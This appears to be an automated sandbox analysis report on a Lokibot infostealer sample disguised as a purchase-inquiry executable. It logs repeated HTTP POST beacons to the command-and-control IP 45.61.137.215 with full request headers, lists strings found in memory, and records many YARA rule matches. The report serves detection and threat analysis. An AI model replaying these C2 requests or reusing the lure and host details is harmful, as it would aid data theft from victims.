                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
                  Source: unknownHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 176Connection: close
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/comments/feed/
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/feed/
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2908357290.000000000049F000.00000040.00000400.00020000.00000000.sdmp, Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/t?id=090
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/wp-json/
                  Source: Purchase Inquiry_#466789.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: Purchase Inquiry_#466789.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: Purchase Inquiry_#466789.exeString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Purchase Inquiry_#466789.exe, Purchase Inquiry_#466789.exe, 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                  Source: Purchase Inquiry_#466789.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 1880, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 7244, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Purchase Inquiry_#466789.exe
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_0116D4FC0_2_0116D4FC
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_05902F980_2_05902F98
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_05902F6B0_2_05902F6B
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_05904EB00_2_05904EB0
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_0590A0A00_2_0590A0A0
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_059038080_2_05903808
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_059033D00_2_059033D0
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_059033C00_2_059033C0
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_059052E80_2_059052E8
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_0040549C2_2_0040549C
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_004029D42_2_004029D4
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: String function: 00405B6F appears 42 times
                  Source: Purchase Inquiry_#466789.exeStatic PE information: invalid certificate
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1676317717.0000000005560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Purchase Inquiry_#466789.exe
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1673543740.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Inquiry_#466789.exe
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1674708202.0000000003F94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Inquiry_#466789.exe
                  Source: Purchase Inquiry_#466789.exe, 00000000.00000002.1677037989.0000000007528000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Inquiry_#466789.exe
                  Source: Purchase Inquiry_#466789.exeBinary or memory string: OriginalFilenameqIBe.exe" vs Purchase Inquiry_#466789.exe
                  Source: Purchase Inquiry_#466789.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
